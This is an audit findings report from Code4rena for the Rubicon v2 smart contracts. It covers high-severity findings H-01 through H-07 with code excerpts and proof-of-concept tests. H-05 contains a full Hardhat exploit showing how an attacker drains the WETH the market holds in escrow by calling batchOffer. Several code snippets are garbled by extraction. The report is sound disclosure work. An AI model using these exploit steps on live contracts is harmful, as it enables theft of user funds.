Rubicon v2
Findings & Analysis Report


Table of contents


About C4

Code4rena (C4) is an open organization consisting of security researchers, auditors, developers, and individuals with domain expertise in smart contracts.

A C4 audit is an event in which community participants, referred to as Wardens, review, audit, or analyze smart contract logic in exchange for a bounty provided by sponsoring projects.

During the audit outlined in this document, C4 conducted an analysis of the Rubicon v2 smart contract system written in Solidity. The audit took place between April 5 — April 13 2023.


194 Wardens contributed reports to the Rubicon v2:

  1. 0Kage
  2. 0x3b
  3. 0x6980
  4. 0xAgro
  5. 0xBeirao
  6. 0xDING99YA
  7. 0xNineDec
  8. 0xPiercer
  9. 0xPkhatri
  10. 0xSmartContract
  11. 0xStalin
  12. 0xTheC0der
  13. 0xWaitress
  14. 0xfusion
  15. 0xhacksmithh
  16. 0xkazim
  17. 0xmichalis
  18. 0xnacho
  19. 0xnev
  20. 117l11
  21. 33audits
  22. 3agle
  23. Ace-30
  24. AlexCzm
  25. Arz
  26. Aymen0909
  27. BGSecurity (anonresercher and martin)
  28. Banditx0x
  29. Bauer
  30. Breeje
  31. CRYP70
  32. CodeFoxInc (thurendous, TerrierLover and retocrooman)
  33. CryptoCraze (jekapi, Yarpo, 0xDACA and tash)
  34. DedOhWale
  35. Delvir0
  36. DijkstraDev
  37. Dug
  38. ElKu
  39. Emmanuel
  40. Evo
  41. Fanz
  42. Ignite
  43. Inspex (Resistor, jokopoppo, DeStinE21, mimic_f, Rugsurely, ErbaZZ and rxnnxchxi)
  44. J4de
  45. JC
  46. JCN
  47. Jigsaw
  48. John
  49. Josiah
  50. Juntao
  51. Kaysoft
  52. KingNFT
  53. LaScaloneta (nicobevi, juancito and 0x4non)
  54. Lilyjjo
  55. Lirios
  56. Madalad
  57. MalfurionWhitehat
  58. MatricksDeCoder
  59. McToady
  60. MohammedRizwan
  61. Neon2835
  62. Nyx
  63. Ocean_Sky
  64. PierrickGT
  65. Qeew
  66. R2
  67. Rageur
  68. Raihan
  69. RaymondFam
  70. RedTiger
  71. ReyAdmirado
  72. Rolezn
  73. Ruhum
  74. SAAJ
  75. SaeedAlipoor01988
  76. Sathish9098
  77. Shubham
  78. SleepingShell
  79. SpicyMeatball
  80. T1MOH
  81. Toshii
  82. Tricko
  83. Udsen
  84. VAD37
  85. Viktor_Cortess
  86. Walter
  87. __141345__
  88. adriro
  89. alexzoid
  90. anodaram
  91. ast3ros
  92. atharvasama
  93. azhar
  94. bearonbike
  95. bin2chen
  96. brgltd
  97. btk
  98. bytes032
  99. c3phas
  100. carlitox477
  101. carrotsmuggler
  102. catellatech
  103. caventa
  104. cccz
  105. cducrest
  106. chaduke
  107. ckksec
  108. cloudjunky
  109. dacian
  110. darksnow
  111. ddimitrov22
  112. dec3ntraliz3d
  113. descharre
  114. dharma09
  115. dontonka
  116. favelanky
  117. fs0c
  118. fyvgsk
  119. ginlee
  120. halden
  121. hunter_w3b
  122. iliyaniliev
  123. immeas
  124. jangle
  125. jasonxiale
  126. joestakey
  127. juancito
  128. kaden
  129. karanctf
  130. koxuan
  131. ktg
  132. kutugu
  133. ladboy233
  134. ljmanini
  135. lopotras
  136. luciana
  137. lukris02
  138. markus_ether
  139. matrix_0wl
  140. minhtrng
  141. mjmoonwalker
  142. mrpathfindr
  143. nirlin
  144. nobody2018
  145. orion
  146. oualidpro
  147. parlayanyildizlartakimi (ulas, caglankaan and ata)
  148. parsely
  149. pavankv
  150. peakbolt
  151. peanuts
  152. pipoca
  153. pixpi
  154. popular00
  155. qbs
  156. qpzm
  157. ravikiranweb3
  158. rbserver
  159. ro1sharkm
  160. rvierdiiev
  161. said
  162. saneryee
  163. sashik_eth
  164. sayan
  165. sces60107
  166. shalaamum
  167. sinarette
  168. tallo
  169. teddav
  170. thekmj
  171. tnevler
  172. top1st
  173. volodya
  174. whoismatthewmc1
  175. xmxanuel
  176. yellowBirdy
  177. zaevlad
  178. zhuXKET

This audit was judged by hickuphh3.

Final report assembled by thebrittfactor.


The C4 analysis yielded an aggregated total of 45 unique vulnerabilities. Of these vulnerabilities, 17 received a risk rating in the category of HIGH severity and 28 received a risk rating in the category of MEDIUM severity.

Additionally, C4 analysis included 29 reports detailing issues with a risk rating of LOW severity or non-critical. There were also 29 reports recommending gas optimizations.

All of the issues presented here are linked back to their original finding.


The code under review can be found within the C4 Rubicon v2 repository, and is composed of 6 smart contracts written in the Solidity programming language and includes 1577 lines of Solidity code.

Severity Criteria

C4 assesses the severity of disclosed vulnerabilities based on three primary risk categories: high, medium, and low/non-critical.

High-level considerations for vulnerabilities span the following key areas when conducting assessments:

  • Malicious Input Handling
  • Escalation of privileges
  • Arithmetic
  • Gas use

For more information regarding the severity criteria referenced throughout the submission review process, please refer to the documentation provided on the C4 website, specifically our section on Severity Categorization.

High Risk Findings (17)

[H-01] RubiconMarket._buys will not work for V1 offers due to the reversion in cancel method.

Submitted by zhuXKET, also found by adriro, cducrest and bin2chen.

RubiconMarket._buys tries to cancel dust remaining offers, but it fails for V1 offers. So it blocks RubiconMarket._buys.

Proof of Concept

In RubiconMarket._buys, it tries to cancel an offer with dust pay token amount after fulfilling. So it sets dustId so it can pass the RubiconMarket.can_cancel modifier.

        if (
            isActive(id) &&
            offers[id].pay_amt < _dust[address(offers[id].pay_gem)]
        ) {
            dustId = id; //enable current msg.sender to call cancel(id)

But when we move into the cancel method, there is another validation. RubiconMarket.cancel will call SimpleMarket.cancel, and SimpleMarket.cancel tries to return dust pay token amount to owner.

        _offer.owner == address(0) && msg.sender == _offer.recipient
            ? require(_offer.pay_gem.transfer(_offer.recipient, _offer.pay_amt))
            : require(_offer.pay_gem.transfer(_offer.owner, _offer.pay_amt));

In this case, msg.sender is different from _offer.recipient, so SimpleMarket.cancel will treat this as a V2 offer, while it can be a valid V1 offer. So for a V1 offer, it tries to send pay token amount to _offer.owner when it is address(0) for V1 offers. So it will revert and SimpleMarket.cancel will not work, although it passes RubiconMarket.can_cancel modifier. This will block the _buy method.

In SimpleMarket.cancel, we should refund pay token amount to _offer.recipient when _offer.owner is address(0).

daoio (Rubicon) disagreed with severity and confirmed via duplicate issue #1281

HickupHH3 (judge) commented via duplicate issue #1281:

I’m selecting #1324 for the report instead because OZ’s. ERC20 implementation blocks transfers to the null address, so in most cases, cancellation will revert as opposed to lost funds.

[H-02] FeeWrapper fails to handle ETH payment refunds

Submitted by adriro, also found by parsely, adriro, VAD37 and fyvgsk.

The FeeWrapper contract can be used to wrap calls that include ETH payments. This is handled by the _rubicallPayable function:

76:     function _rubicallPayable(
77:         CallParams memory _params
78:     ) internal returns (bytes memory) {
79:         // charge fee from feeParams
80:         uint256 _msgValue = _chargeFeePayable(_params.feeParams);
82:         (bool _OK, bytes memory _data) ={value: _msgValue}(
83:             bytes.concat(_params.selector, _params.args)
84:         );
86:         require(_OK, "low-level call to the router failed");
88:         return _data;
89:     }

As we can see in the previous snippet, the implementation will forward the ETH payment (minus fees) to the target contract. If the target contract ends up using less ETH than the sent amount, then the usual approach would be to refund the remaining ETH back to the caller, which is a normal and common operation.

If this is the case, then the wrapped call will fail as the FeeWrapper doesn’t implement the receive or fallback function to allow ETH payments. Even though there is no loss of funds as the transaction is reverted, the issue will prevent users from wrapping calls to target contracts that may refund ETH as part of their normal behavior.

As a potential real example, we can the explore the buyAllAmountWithETH function present in the RubiconRouter contract:

379:     function buyAllAmountWithETH(
380:         ERC20 buy_gem,
381:         uint256 buy_amt,
382:         uint256 max_fill_amount
383:     ) external payable beGoneReentrantScum returns (uint256 fill) {
384:         address _weth = address(wethAddress);
385:         uint256 _before = ERC20(_weth).balanceOf(address(this));
386:         require(
387:             msg.value == max_fill_amount,
388:             "must send as much ETH as max_fill_amount"
389:         );
390:         IWETH(wethAddress).deposit{value: max_fill_amount}(); // Pay with native ETH -> WETH
392:         if (
393:             IWETH(wethAddress).allowance(address(this), RubiconMarketAddress) <
394:             max_fill_amount
395:         ) {
396:             approveAssetOnMarket(wethAddress);
397:         }
399:         // An amount in WETH
400:         fill = RubiconMarket(RubiconMarketAddress).buyAllAmount(
401:             buy_gem,
402:             buy_amt,
403:             ERC20(wethAddress),
404:             max_fill_amount
405:         );
406:         IERC20(buy_gem).safeTransfer(msg.sender, fill);
408:         uint256 _after = ERC20(_weth).balanceOf(address(this));
409:         uint256 delta = _after - _before;
411:         // Return unspent coins to sender
412:         if (delta > 0) {
413:             IWETH(wethAddress).withdraw(delta);
414:             // msg.sender.transfer(delta);
415:             (bool success, ) ={value: delta}("");
416:             require(success, "Transfer failed.");
417:         }
418:     }

As we can see in the previous snippet, the function will potentially refund the caller the unspent ETH in lines 412-417. If this call is being wrapped using the FeeWrapper, then msg.sender will be the FeeWrapper contract.

Proof of Concept

In the following test, we create a demonstration contract FeeWrapperTarget which includes a function named demoETH that will refund half of the sent amount back to the caller. The wrapped call will fail, as the FeeWrapperTarget will try to refund the ETH to the FeeWrapper contract which doesn’t allow ETH payments, causing the whole transaction to be reverted.

Note: the snippet shows only the relevant code for the test. Full test file can be found here.

function test_FeeWrapper_FailsWithETHRefund() public {
    FeeWrapperTarget target = new FeeWrapperTarget(ERC20(address(0)));

    uint256 amount = 1 ether;
    uint256 fee = 0.1 ether;, amount + fee);

    // Alice will call demoERC20

    FeeWrapper.CallParams memory callParams;
    callParams.selector = FeeWrapperTarget.demoETH.selector;
    callParams.args = ""; = address(target);
    callParams.feeParams.feeToken = address(0);
    callParams.feeParams.totalAmount = amount + fee;
    callParams.feeParams.feeAmount = fee;
    callParams.feeParams.feeTo = makeAddr("FeeRecipient");

    // The following call will fail, the FeeWrapper contract is not prepared to receive the ETH from the target contract
    vm.expectRevert("low-level call to the router failed");
    feeWrapper.rubicall{value: amount + fee}(callParams);



Allow the FeeWrapper contract to receive ETH by implementing the receive function. After the call to the target contract, refund any ETH amount present in the FeeWrapper contract back to the original caller.

daoio (Rubicon) confirmed via duplicate issue #1283

HickupHH3 (judge) increased severity to High and commented:

Core issue is that the FeeWrapper lacks functionality to handle refunds in general, whether in ETH or ERC20. Specifically, for ETH, lacking receive() / fallback() functions to accept inbound transfers.

Generally, I would’ve considered this to be Medium severity because it’s conditional on the target contract sending back funds. However, the FeeWrapper is expected to interact with the Rubicon contracts, which the warden has shown to have the ability send back funds. Hence, the High severity is justified.

[H-03] Reward accounting is incorrect in BathBuddy contract

Submitted by adriro, also found by R2, cducrest, zhuXKET, dec3ntraliz3d, 0xTheC0der, AlexCzm, markus_ether, 0xTheC0der, immeas, teddav, immeas, kutugu, nirlin, joestakey, kaden, John, nirlin, Emmanuel, 0Kage, shalaamum, Toshii, Delvir0, rbserver, __141345__, __141345__, 0xDING99YA, 0xDING99YA, ast3ros, Lirios, sces60107, jasonxiale, mrpathfindr, SaeedAlipoor01988, KingNFT, Ace-30, sinarette, carrotsmuggler, carrotsmuggler, Lilyjjo, Lilyjjo, lopotras, ktg, Banditx0x, yellowBirdy, dontonka, RedTiger, Banditx0x, bytes032, cccz, bytes032, mjmoonwalker, cccz, chaduke, SpicyMeatball, bytes032, nobody2018, T1MOH, Juntao, 0xStalin, J4de, Dug, ljmanini, 0xmichalis, rvierdiiev, Fanz, rvierdiiev and 117l11.

The BathBuddy contracts implements rewards for liquidity providers (holders of BathToken). The contract is modeled after the famous Synthetix staking contract, with some tweaks to support rewards for multiple tokens at the same time.

The implementation overall is correct; however, there is a critical difference with the Synthetix contract that is ignored in the BathBuddy contract. In the Synthetix implementation, the main actions related to rewards accounting are the stake and withdraw actions. These trigger the updateReward modifier to ensure correct reward accounting. Staked tokens cannot be transferred, as these are held in the staking contract. In the BathBuddy implementation, things are very different as there is no staking. Rewards are intended to be distributed directly to holders of the BathToken without any need of staking the tokens in the contract. This means that, as there is no “staking” action in the BathBuddy implementation (i.e. depositing funds in the contract), rewards fail to be correctly accounted whenever BathToken are minted, burned or transferred between different accounts.

These are two critical places in the code where the BathBuddy contract uses the state from the BathToken, but fails to be triggered whenever the state in the BathToken is modified. The first is rewardPerToken, which calculates the amount of rewards that should correspond to one unit of the BathToken token. This is logically dependent on the total supply of the token (lines 124 and 133):

121:     function rewardPerToken(address token) public view returns (uint256) {
122:         require(friendshipStarted, "I have not started a bathToken friendship");
124:         if (IERC20(myBathTokenBuddy).totalSupply() == 0) {
125:             return rewardsPerTokensStored[token];
126:         }
127:         return
128:             rewardsPerTokensStored[token].add(
129:                 lastTimeRewardApplicable(token)
130:                     .sub(lastUpdateTime[token])
131:                     .mul(rewardRates[token])
132:                     .mul(1e18)
133:                     .div(IERC20(myBathTokenBuddy).totalSupply())
134:             );
135:     }

The other place is in the earned function which uses the BathToken balanceOf function of an account (lines 146-147):

139:     function earned(
140:         address account,
141:         address token
142:     ) public view override returns (uint256) {
143:         require(friendshipStarted, "I have not started a bathToken friendship");
145:         return
146:             IERC20(myBathTokenBuddy) // Care with this?
147:                 .balanceOf(account)
148:                 .mul(
149:                     rewardPerToken(token).sub(
150:                         userRewardsPerTokenPaid[token][account]
151:                     )
152:                 )
153:                 .div(1e18)
154:                 .add(tokenRewards[token][account]);
155:     }
157:     function getRewardForDuration(
158:         address token
159:     ) external view returns (uint256) {
160:         return rewardRates[token].mul(rewardsDuration[token]);
161:     }

Since the whole BathBuddy contract is dependent on the total supply and account balance state of the paired BathToken contract, the following actions in the token should update the rewards state in BathBuddy:

  • mint and burn, as these modify the total supply of the token and the balances of the account whose tokens are minted or burned.
  • transfer and transferFrom, as these modify the balances of the sender and recipient accounts.

As the BathBuddy updateReward modifier fails to be triggered when the mentioned state in the BathToken is modified, reward accounting will be incorrect for many different scenarios. We’ll explore one of these in the next section.

Proof of Concept

In the following test, we demonstrate one of the possible scenarios where reward accounting is broken. This is a simple case in which rewards fail to be updated when a token transfer is executed. Alice has 1e18 BathTokens, at the middle of the rewards duration period she sends all her tokens to Bob. The expected outcome should be that Alice would earn half of the rewards, as she held the tokens for the half of the duration period. But when the duration period has ended, we call getReward for both Alice and Bob and we can see that Alice got nothing and Bob earned 100% of the rewards.

Note: the snippet shows only the relevant code for the test. Full test file can be found here.

function test_BathBuddy_IncorrectRewardAccounting() public {
    // Setup rewards
    uint256 startTime = block.timestamp;
    uint256 duration = 10_000 seconds;
    bathBuddy.setRewardsDuration(duration, address(rewardToken));

    uint256 rewardAmount = 100 ether;, rewardAmount);
    bathBuddy.notifyRewardAmount(rewardAmount, rewardToken);

    // Mint bathTokens to Alice
    uint256 bathTokenAmount = 1 ether;, bathTokenAmount);

    // Simulate half of the duration time passes
    vm.warp(startTime + duration / 2);

    // Alice transfers tokens for Bob at middle of the period
    bathToken.transfer(bob, bathTokenAmount);

    // Simulate complete duration time passes
    vm.warp(startTime + duration);

    // Trigger getRewards for Alice
    bathBuddy.getReward(rewardToken, alice);

    // Trigger getRewards for Bob
    bathBuddy.getReward(rewardToken, bob);

    // Alice gets nothings and Bob gets the full rewards, even though Alice held the tokens for half the duration time
    assertEq(rewardToken.balanceOf(alice), 0);
    assertEq(rewardToken.balanceOf(bob), rewardAmount);


There are two recommended paths here. The easy path would be to just add the stake and withdraw functions to the BathBuddy contract similar to how the original StakingRewards contract works on Synthetix. However, this may change the original intention of the protocol as rewards won’t be earned just by holding BathTokens, they will need to be staked (rewards will only be distributed to stakers).

The other path, and a bit more complex, would be to modify the BathToken contract (the cToken) so that burn, mint and transfer actions trigger the update on the paired BathBuddy contract.

daoio (Rubicon) confirmed

HickupHH3 (judge) commented:

This write-up encapsulates the issues arising from forking the staking contract, but doing away with the staking portion through the usage of balanceOf() and totalSupply().

  • No initialisation of userRewardsPerTokenPaid
  • Doesn’t account for holding duration

0xepley (warden) commented:

I think that in the duplicate, two categories of issues have been merged into one.

So the two separate problems that have been merged into one are:

  1. Difference of implementation from synthetix, where there is no modifier on stake and withdraw. Hence, the calculation is flawed, leading to being able to claim the reward for whole duration by minting at the last moment, reducing others’ rewards.
  2. Second, is the ability to transfer the token and claim (again and again, etc) until the contract is drained.

Both are different issues and require different solutions.

Just for example, two marked duplicates are: #1074 and #1168. Each explain separate issues of uneven distribution and draining.

HickupHH3 (judge) commented:

(2) is enabled by (1).

The removal of staking & withdrawing (1) also led to the removal of initialisation of the rewardsPerToken, which allows you to do (2).

[H-04] Some positions will get liquidated immediately

Submitted by immeas, also found by 0xBeirao, kaden, ast3ros, cccz and ladboy233.

When opening a position, the user makes a deposit and takes a loan against this on the Rubicon compound fork. This loan is taken using max liquidity:

File: utilities/poolsUtility/Position.sol

306:    function _maxBorrow(
307:        address _bathToken
308:    ) internal view returns (uint256 _max) {
309:        (uint256 _err, uint256 _liq, uint256 _shortfall) = comptroller
310:            .getAccountLiquidity(address(this));
312:        require(_err == 0, "_maxBorrow: ERROR");
313:        require(_liq > 0, "_maxBorrow: LIQUIDITY == 0");
314:        require(_shortfall == 0, "_maxBorrow: SHORTFALL != 0");
316:        uint256 _price = oracle.getUnderlyingPrice(CToken(_bathToken));
317:        _max = (_liq.mul(10 ** 18)).div(_price);
318:        require(_max > 0, "_maxBorrow: can't borrow 0");
319:    }

The danger here, is the interest rate for a loan needs to be higher than the interest for the deposit of the collateral. Hence, the block after the loan is taken it will be under water.

Positions opened will, in the block after they are created, become under water and be possible to liquidate.

This only impacts a certain set of leverages (shorts 1x, longs 1.7x and so on) where you loan up to your collateral max; hence, medium severity.

A user will have to know about this behavior in Position and in the same tx (to be safe) increase their margin to not be vulnerable to liquidation.

Proof of Concept

PoC test, PositionTest.t.sol:

pragma solidity ^0.8.0;

import "../../contracts/compound-v2-fork/WhitePaperInterestRateModel.sol";
import "../../contracts/compound-v2-fork/CErc20Delegate.sol";
import "../../contracts/compound-v2-fork/CErc20.sol";
import "../../contracts/compound-v2-fork/Comptroller.sol";
import "../../contracts/compound-v2-fork/CToken.sol";
import "../../contracts/periphery/TokenWithFaucet.sol";
import "../../contracts/periphery/DummyPriceOracle.sol";
import "../../contracts/RubiconMarket.sol";
import "../../contracts/BathHouseV2.sol";
import "../../contracts/utilities/poolsUtility/Position.sol";
import "../../contracts/utilities/poolsUtility/PoolsUtility.sol";

import "forge-std/Test.sol";

contract PositionTest is Test {
  address public owner;
  address FEE_TO = 0x0000000000000000000000000000000000000FEE;
  // core contracts
  RubiconMarket market;
  Comptroller comptroller;
  BathHouseV2 bathHouse;

  DummyPriceOracle oracle;

  // test tokens
  TokenWithFaucet TEST;
  TokenWithFaucet TUSDC;

  CErc20 cTEST;
  CErc20 cTUSDC;

  address alice = 0x0000000000000000000000000000000000000123;
  address bob = 0x0000000000000000000000000000000000000124;

  function setUp() public {
    owner = msg.sender;
    // deploy Comptroller instance
    comptroller = new Comptroller();

    // deploy new Market instance and init
    market = new RubiconMarket();

    // deploy test tokens
    TEST = new TokenWithFaucet(address(this), "Test", "TEST", 18);
    TUSDC = new TokenWithFaucet(address(this), "Test Stablecoin", "TUSDC", 6);

    // baseRate = 0.3, multiplierPerYear = 0.02
    WhitePaperInterestRateModel irModel = new WhitePaperInterestRateModel(3e17, 2e16);
    CErc20Delegate bathTokenImplementation = new CErc20Delegate();

    bathHouse = new BathHouseV2();
    bathHouse.createBathToken(address(TEST), irModel, 1e18, address(bathTokenImplementation), "");
    bathHouse.createBathToken(address(TUSDC), irModel, 1e18, address(bathTokenImplementation), "");

    cTEST = CErc20(bathHouse.getBathTokenFromAsset(address(TEST)));
    cTUSDC = CErc20(bathHouse.getBathTokenFromAsset(address(TUSDC)));

    // 1:1 for simplicity
    oracle = new DummyPriceOracle();

    comptroller._setCloseFactor(0.5e18); // 0.5 close factor, same as compound mainnet
    comptroller._setLiquidationIncentive(1.08e18); // 8% same as compound mainnet

    // add some $$$ to the Market
    TEST.approve(address(market), type(uint256).max);
    TUSDC.approve(address(market), type(uint256).max);

    market.offer(100e6, TUSDC, 100e18, TEST);

  function test_LiquidatePositionAfterCreation() public {
    PoolsUtility pools = new PoolsUtility();


    address[] memory positions = pools.getPositions(alice);
    Position position = Position(positions[0]);

    uint256 amount = 10e6;,amount);

    (, uint256 liquidity, uint256 shortfall) = comptroller.getAccountLiquidity(address(position));
    // position under water

    // next block
    vm.roll(block.number + 1);

    // trigger interest calculation
    uint256 borrowBalance = cTEST.borrowBalanceCurrent(address(position));

    (, liquidity, shortfall) = comptroller.getAccountLiquidity(address(position));

    // becomes liquidated

closeFactor and liquidationIncentive is the same as compound on mainnet.

Added a mint function in the TokenWithFaucet:

    function mint(address account, uint256 amount) external {
        _mint(account, amount);

Tools Used

Manual audit, forge

Introduce a safety factor to scale the loans, which the user can provide when opening the position.

daoio (Rubicon) confirmed via duplicate issue #827

HickupHH3 (judge) increased severity to High and commented:

Selected as best because of the POC, which showcases how the account is subject to liquidation in the next block after leveraging.

[H-05] RubiconMarket batchOffer and batchRequote make offers as self; complete loss of funds for some types of tokens, for example WETH

Submitted by shalaamum, also found by nirlin, Lirios, carrotsmuggler, BGSecurity, Inspex, DedOhWale, Lirios, tallo, nobody2018, and T1MOH.

The RubiconMarket functions batchOffer and batchRequote both contain calls to offer as follows:


But calling offer using this.offer will use a message call instead of a jump. This means that in offer, the value of msg.sender will be the address of the RubiconMarket contract, not of the original sender. Hence, the offer will be made by the RubiconMarket itself.

An attacker can use this to make RubiconMarket offer all its balance of a particular token (possibly in exchange for a token the attacker created, at effectively zero cost), with the attacker then taking the offer and thereby stealing RubiconMarket’s entire balance for that token.

For this attack to work, the RubiconMarket must be able to actually make the offer itself; the crucial condition here is in line 538.

require(pay_gem.transferFrom(msg.sender, address(this), pay_amt));

In the offer function of SimpleMarket, it must not revert if this call is made by the RubiconMarket contract and msg.sender is also the same contract, even though RubiconMarket did not approve a transfer to itself.

Whether this condition is satisfied will depend on the token. For example, in the standard ERC20 token contract by OpenZeppelin, this condition is not satisfied. However, in the WETH contract, the check in the transferFrom function is.

if (src != msg.sender && allowance[src][msg.sender] != uint(-1)) {
    require(allowance[src][msg.sender] >= wad);
    allowance[src][msg.sender] -= wad;

If the caller is also the src, then it is not necessary to approve the transfer beforehand. This means the vulnerability outlined above can be used to drain all WETH held by a RubiconMarket, and possibly the balance in other tokens where transferFrom is implemented similarly.

Proof of Concept

After applying the diff below, run:

npx hardhat test --grep "ShalaamumMarketThis"

To run the POC, the output should contain the following:

  Rubicon v2 Protocol Tests
      ✓ Initialized Market
      ✓ attacker has 1 ETH and 0 WETH
      ✓ attacker deploys own attackerCoin
      ✓ rubiconMarket holds 10 WETH
      ✓ Attacker exploiting vulnerability and making market offer assets held in escrow
      ✓ Attacker taking offer
      ✓ rubiconMarket holds 0 WETH
      ✓ attacker holds 10 WETH

The POC demonstrates how an attacker can deploy their own token and then use batchOffer to make the RubiconMarket offer its entire balance of WETH for some of the attacker’s token. The attacker then takes that offer at no cost (except some gas) and thereby steals the 10 WETH the RubiconMarket held in escrow for previous unfilled offers.

Files to change

Apply the following diff to test/hardhat-tests/ProtocolDeployment.ts:

diff --git a/test/hardhat-tests/ProtocolDeployment.ts b/test/hardhat-tests/ProtocolDeployment.ts
index b55d879..0b8e6ba 100644
--- a/test/hardhat-tests/ProtocolDeployment.ts
+++ b/test/hardhat-tests/ProtocolDeployment.ts
@@ -1,4 +1,4 @@
-import { time, loadFixture } from "@nomicfoundation/hardhat-network-helpers";
+import { time, loadFixture, setBalance } from "@nomicfoundation/hardhat-network-helpers";
 import { anyValue } from "@nomicfoundation/hardhat-chai-matchers/withArgs";
 import { expect } from "chai";
 import { ethers, network } from "hardhat";
@@ -213,6 +213,77 @@ describe("Rubicon v2 Protocol Tests", function () {
+  describe("ShalaamumMarketThis", function () {
+    let rubiconMarket, weth, attacker;
+    let attackerCoin;
+    const attackerBalanceStart = 10n**18n;
+    let marketWethStart;
+    before(async function () {
+      let otherAccount;
+      ({ rubiconMarket, weth, otherAccount } = await loadFixture(
+        deployRubiconProtocolFixture
+      ));
+      attacker = otherAccount;
+    });
+    it("Initialized Market", async function () {
+      expect(await rubiconMarket.initialized()).to.equal(true);
+    });
+    it("attacker has 1 ETH and 0 WETH", async function () {
+      setBalance(attacker.address, attackerBalanceStart);
+      expect(await ethers.provider.getBalance(attacker.address)).eq(attackerBalanceStart);
+      expect(await weth.balanceOf(attacker.address)).eq(0);
+    });
+    it("attacker deploys own attackerCoin", async function () {
+      const testCoinFactory = await ethers.getContractFactory("TokenWithFaucet", attacker);
+      attackerCoin = await testCoinFactory.deploy(
+        attacker.address,
+        "AttackerCoin",
+        "ATTACKCOIN",
+        18
+      );
+      await attackerCoin.connect(attacker).adminMint();
+      expect(await attackerCoin.balanceOf(attacker.address));
+    });
+    it("rubiconMarket holds 10 WETH", async function () {
+      marketWethStart = await weth.balanceOf(rubiconMarket.address);
+      expect(marketWethStart).eq(10n*10n**18n);
+    });
+    it("Attacker exploiting vulnerability and causing market to offer assets held in escrow", async function () {
+      await rubiconMarket.connect(attacker).batchOffer(
+        [marketWethStart],
+        [weth.address],
+        [1],
+        [attackerCoin.address]
+      );
+    });
+    it("Attacker taking offer", async function () {
+      let lastOfferId = await rubiconMarket.last_offer_id();
+      await attackerCoin.connect(attacker).approve(
+        rubiconMarket.address,
+        1
+      )
+      await rubiconMarket.connect(attacker).buy(
+        lastOfferId,
+        marketWethStart.mul(10000).div(9999)
+      );
+    });
+    it("rubiconMarket holds 0 WETH", async function () {
+      expect(await weth.balanceOf(rubiconMarket.address)).eq(0);
+    });
+    it("attacker holds 10 WETH", async function () {
+      expect(await weth.balanceOf(attacker.address)).eq(10n*10n**18n);
+    });
+  });
   describe("Protocol Tests", async function () {
     // *** Core ***
     describe("Rubicon Market", function () {


Change this.offer to offer. As the offer function is currently external, it will have to be changed to public.

bghughes (Rubicon) confirmed

HickupHH3 (judge) commented:

  • Satisfactory: How funds can be drained for token implementations that skip approvals when src is msg.sender / src == dest.
  • 50%: Reverting txns from insufficient token approval.

[H-06] Position doesn’t distribute rewards to users

Submitted by Ruhum, also found by immeas, John and rvierdiiev.

In Compound V2, both borrowers and suppliers are eligible to earn rewards. The Position contract allows users to create long/short positions for each market. For that, it both supplies and borrows tokens from a compound market. So while the user is the one who provided the initial tokens to open up a position, it’s the Position contract that holds the cTokens that earn the rewards. These rewards are not distributed to position owners. Instead, they are locked up as the Position contract never claims them. That also means that anybody else who uses the market has their rewards diluted.

Proof of Concept

Whenever cTokens are minted, transferred or burned, the Comptroller is notified to distribute rewards. When cTokens are minted, mintFresh() triggers Comptroller.mintAllowed() which distributes rewards through distributeSupplierComp().

    // CToken.sol
    function mintFresh(address minter, uint mintAmount) internal {
        /* Fail if mint not allowed */
        uint allowed = comptroller.mintAllowed(address(this), minter, mintAmount);
        // ...

    // Comptroller.sol
    function mintAllowed(
        address cToken,
        address minter,
        uint mintAmount
    ) external override returns (uint) {
        // Pausing is a very serious situation - we revert to sound the alarms
        require(!mintGuardianPaused[cToken], "mint is paused");

        // Shh - currently unused

        if (!markets[cToken].isListed) {
            return uint(Error.MARKET_NOT_LISTED);

        // Keep the flywheel moving
        distributeSupplierComp(cToken, minter);

        return uint(Error.NO_ERROR);

The Position contract supplies and borrows tokens from the market when opening up a new position or updating an existing one:

    /// @notice borrow `_amount` of underlying token of `_cToken`
    function _borrow(address _cToken, uint256 _amount) internal {
            CErc20Interface(_cToken).borrow(_amount) == 0,
            "_borrow: BORROW FAILED"

    function _supply(
        address _token,
        address _bathToken,
        uint256 _amount
    ) internal returns (uint256 _bathTokenAmount) {
        uint256 _initBathTokenAmount = IERC20(_bathToken).balanceOf(
        IERC20(_token).safeApprove(_bathToken, _amount);
            CErc20Interface(_bathToken).mint(_amount) == 0,
            "_supply: MINT FAILED"
        uint256 _currentBathTokenAmount = IERC20(_bathToken).balanceOf(

        assembly {
            switch _initBathTokenAmount
            case 0 {
                _bathTokenAmount := _currentBathTokenAmount
            default {
                _bathTokenAmount := sub(

In BathHouseV2 we can see that the protocol expects to use the Comptroller rewards mechanism. It calls claimComp() to harvest those rewards for the caller:

    /// @notice claim available rewards
    /// across all the pools
    function claimRewards(
        address[] memory buddies,
        address[] memory rewardsTokens
    ) external {
        // claim rewards from comptroller
        // get rewards from bathBuddy
        for (uint256 i = 0; i < buddies.length; ++i) {

To claim the rewards, the Position contract also has to call claimComp(), but it never does. Thus, the rewards are accrued to the Position contract but never claimed.

The Position contract has to distribute rewards to users.

daoio (Rubicon) confirmed

HickupHH3 (judge) commented:

Considering this to be High severity because of certain and total loss of yield without additional requirements.

[H-07] Wrong calculation of repayment amount in Position contract

Submitted by Toshii, also found by immeas and 0xDING99YA.

When a user calls closePosition(..) -> _repay(..) on the Position contract, the function borrowBalanceOfPos(..) is used to calculate the amount that the user needs to repay. This repayment amount is equivalent to the amount the user borrowed (_borrowedAmount) plus their interest (_interest). To calculate this interest portion, the function multiplies the current borrowRate by the difference in number of blocks between when the user created the position and the current block timestamp. The issue arises because the borrowRate over the entire duration of the borrow is defined as: rate = CTokenInterface(bathToken).borrowRatePerBlock();. However, borrowRatePerBlock() is a function of total borrows and total supply for the cToken; thus, is not required to be the same over the entire duration of when the user takes it out of their position. This means the calculated repayment amount can potentially overshoot/undershoot the actual amount.

Proof of Concept


  1. Bob uses the Position contract to open a leveraged position using the buyAllAmountWithLeverage(..) function. This results in an increased borrow interest rate.
  2. Later, Alice also uses the Position contract to open a leveraged position using the buyAllAmountWithLeverage(..) function. This again results in an increased borrow interest rate.
  3. Bob calls closePosition(..), where the call to _repay(..) references the current borrowRatePerBlock(), which prices Bob’s interest at the rate which includes Bob and Alice’s borrows.

This results in excess asset being swapped to quote, rather than what is needed for repayment.

Potentially keep track of changes in the supply/borrow state. However, this might not be worth the tradeoff in increased gas.

daoio (Rubicon) confirmed

HickupHH3 (judge) increased severity to High and commented:

Incorrect interest calculation, consider this to be high severity because it affects repay amount.

[H-08] An attacker can steal all RubiconRouter funds

Submitted by CryptoCraze.

